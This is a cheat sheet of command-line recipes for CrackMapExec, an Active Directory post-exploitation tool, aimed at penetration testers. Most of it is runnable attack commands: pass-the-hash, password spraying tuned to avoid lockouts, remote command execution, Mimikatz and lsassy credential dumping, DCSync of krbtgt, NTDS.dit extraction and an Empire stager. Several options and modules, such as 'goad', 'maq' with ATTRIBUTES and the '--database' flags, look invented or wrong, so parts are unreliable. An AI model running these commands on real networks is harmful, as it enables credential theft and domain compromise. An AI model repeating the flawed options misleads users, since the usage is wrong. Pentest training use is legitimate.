CrackMapExec Cheat Sheet¶

Overview¶

CrackMapExec (CME) is a post-exploitation tool designed for penetration testing and red team operations in Windows/Active Directory environments. It's often described as a "Swiss Army knife" for network penetration testing, allowing for enumeration, credential testing, and command execution across multiple protocols.

⚠️ Warning: CrackMapExec is a security testing tool that should only be used in environments where you have explicit permission to do so.

Installation¶

Using pipx (Recommended)¶

# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Install CrackMapExec
pipx install crackmapexec

On Kali Linux¶

sudo apt update
sudo apt install -y crackmapexec

From GitHub¶

git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install

Using Docker¶

docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexec

Basic Usage¶

General Syntax¶

crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]

Supported Protocols¶

smb: Server Message Block
winrm: Windows Remote Management
ldap: Lightweight Directory Access Protocol
mssql: Microsoft SQL Server
ssh: Secure Shell
rdp: Remote Desktop Protocol
ftp: File Transfer Protocol

Target Specification¶

# Single target
crackmapexec smb 192.168.1.100

# Multiple targets
crackmapexec smb 192.168.1.100,192.168.1.101

# IP range
crackmapexec smb 192.168.1.1-255

# CIDR notation
crackmapexec smb 192.168.1.0/24

# From file
crackmapexec smb targets.txt

Authentication Methods¶

Username and Password¶

# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'

# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'

# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'

# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

Pass-the-Hash¶

# NTLM hash
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'

# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txt

Local Authentication¶

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-auth

Domain Authentication¶

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAIN

SMB Protocol Commands¶

Basic Enumeration¶

# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares

# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users

# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups

# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Check for SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

Command Execution¶

# Execute command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

File Operations¶

# List files in share
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'

# Download file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt

# Upload file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt'

WinRM Protocol Commands¶

Basic Enumeration¶

# Check WinRM access
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'

Command Execution¶

# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

LDAP Protocol Commands¶

Basic Enumeration¶

# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain

# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers

# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusts

Advanced Enumeration¶

# Search for specific attributes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description

# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation

# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate

# Search for ASREP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt

# Search for kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txt

MSSQL Protocol Commands¶

Basic Enumeration¶

# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'

# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'

Command Execution¶

# Execute command
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'

# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'

Module Usage¶

Module Management¶

# List available modules
crackmapexec <protocol> --list-modules

# Get module options
crackmapexec <protocol> -M <module> --options

# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2

Common Modules¶

Mimikatz¶

# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'

# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'

# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'

# Get DCSync
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'

Empire¶

# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=http

PowerView¶

# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'

BloodHound¶

# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=All

Lsassy¶

# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassy

Enum_DNS¶

# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dns

GOAD¶

# Get objects and attributes from domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goad

Advanced Techniques¶

Password Spraying¶

# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'

# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt

# Spray with jitter to avoid lockouts
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10

Credential Harvesting¶

# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam

# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa

# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntds

Database Operations¶

Initialize Database¶

crackmapexec smb 192.168.1.0/24 --database

View Database¶

# List hosts
crackmapexec smb --database -L

# List credentials
crackmapexec smb --database -C

# Use credentials from database
crackmapexec smb 192.168.1.0/24 --database -id 1

Common Options¶

Option	Description
`-h, --help`	Show help message and exit
`-t THREADS`	Set number of concurrent threads (default: 100)
`--timeout TIMEOUT`	Set timeout for connections (default: 5 seconds)
`--verbose`	Enable verbose output
`--debug`	Enable debug output
`--continue-on-success`	Continue authentication attempts even after success
`--no-bruteforce`	No bruteforce, only use provided credentials
`--fail-limit LIMIT`	Number of failed login attempts before giving up on a host
`--jitter JITTER`	Add random delay between authentication attempts (in seconds)
`--local-auth`	Authenticate using local accounts instead of domain
`-d, --domain DOMAIN`	Domain to authenticate to
`--no-output`	Do not display output
`--output-file FILE`	Write output to file
`--log`	Enable logging to file (default: ~/.cme/logs/)

Protocol-Specific Options¶

SMB Options¶

Option	Description
`--shares`	List available shares
`--sessions`	List active sessions
`--disks`	List disks
`--loggedon-users`	List logged-on users
`--users`	List domain users
`--groups`	List domain groups
`--local-groups`	List local groups
`--pass-pol`	Get password policy
`--rid-brute [MAX_RID]`	Enumerate users by bruteforcing RID
`--sam`	Dump SAM hashes
`--lsa`	Dump LSA secrets
`--ntds`	Dump NTDS.dit
`--exec-method \\{smbexec,wmiexec,mmcexec,atexec\\}`	Method to execute commands

LDAP Options¶

Option	Description
`--users`	List domain users
`--groups`	List domain groups
`--computers`	List domain computers
`--domain`	Get domain information
`--pass-pol`	Get password policy
`--trusts`	Get domain trusts
`--asreproast [OUTFILE]`	Get AS-REP roastable users
`--kerberoasting [OUTFILE]`	Get kerberoastable users
`--trusted-for-delegation`	Get users/computers with unconstrained delegation
`--allowed-to-delegate`	Get users/computers with constrained delegation

WinRM Options¶

Option	Description
`--port [PORT]`	WinRM port (default: 5985)
`--ssl`	Use SSL for WinRM

MSSQL Options¶

Option	Description
`--port [PORT]`	MSSQL port (default: 1433)
`-q QUERY`	Execute SQL query

CrackMapExec Cheat Sheet¶

Overview¶

Installation¶

Using pipx (Recommended)¶

On Kali Linux¶

From GitHub¶

Using Docker¶

Basic Usage¶

General Syntax¶

Supported Protocols¶

Target Specification¶

Authentication Methods¶

Username and Password¶

Pass-the-Hash¶

Local Authentication¶

Domain Authentication¶

SMB Protocol Commands¶

Basic Enumeration¶

Command Execution¶

File Operations¶

WinRM Protocol Commands¶

Basic Enumeration¶

Command Execution¶

LDAP Protocol Commands¶

Basic Enumeration¶

Advanced Enumeration¶

MSSQL Protocol Commands¶

Basic Enumeration¶

Command Execution¶

Module Usage¶

Module Management¶

Common Modules¶

Mimikatz¶

Empire¶

PowerView¶

BloodHound¶

Lsassy¶

Enum_DNS¶

GOAD¶

Advanced Techniques¶

Password Spraying¶

Credential Harvesting¶

Database Operations¶

Initialize Database¶

View Database¶

Common Options¶

Protocol-Specific Options¶

SMB Options¶

LDAP Options¶

WinRM Options¶

MSSQL Options¶

Resources¶